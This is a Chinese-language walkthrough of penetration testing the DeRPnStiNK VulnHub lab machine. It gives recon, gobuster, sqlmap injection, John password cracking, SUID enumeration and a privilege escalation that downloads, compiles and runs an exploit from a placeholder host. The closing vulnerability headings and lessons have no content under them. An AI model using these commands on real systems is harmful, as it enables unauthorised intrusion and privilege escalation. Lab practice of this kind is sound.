DeRPnStiNK 是一个中等难度的 VulnHub 靶机,设计用于练习渗透测试技能。它包含多种漏洞类型,包括Web应用漏洞、权限提升机会等。
使用工具:nmap, netdiscover
netdiscover -r 192.168.1.0/24
nmap -sV -A -T4 192.168.1.105
发现服务: - 22/tcp - SSH - 80/tcp - HTTP (Apache 2.4.7) - 111/tcp - rpcbind - 2049/tcp - nfs_acl
目录爆破:
gobuster dir -u http://192.168.1.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
发现路径: - /weblog/ - /php/
Web应用分析: - /weblog/ 是一个博客系统 - /php/ 包含phpinfo.php文件,泄露服务器信息
发现漏洞: - 在/weblog/中发现SQL注入漏洞 - 使用sqlmap进行自动化利用:
sqlmap -u "http://192.168.1.105/weblog/index.php?id=1" --dbs
获取凭据: - 从数据库中提取用户名和密码哈希 - 使用John the Ripper破解密码:
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
SSH登录:
ssh derp@192.168.1.105
枚举系统信息:
uname -a
sudo -l
find / -perm -4000 -type f 2>/dev/null
发现漏洞: - 过期的sudo版本存在提权漏洞 - 使用已知漏洞利用代码:
wget http://example.com/exploit.c -O /tmp/exploit.c
gcc /tmp/exploit.c -o /tmp/exploit
chmod +x /tmp/exploit
/tmp/exploit
成功提权: - 利用后获得root shell - 读取flag文件:
cat /root/flag.txt
SQL注入漏洞:
弱密码问题:
过期的sudo版本:
信息泄露:
DeRPnStiNK靶机展示了从外部侦察到最终获取root权限的完整渗透测试流程。通过这个实例,我们可以学习到:
这种实战练习有助于理解攻击者的思维方式和常见攻击路径,从而更好地构建防御策略。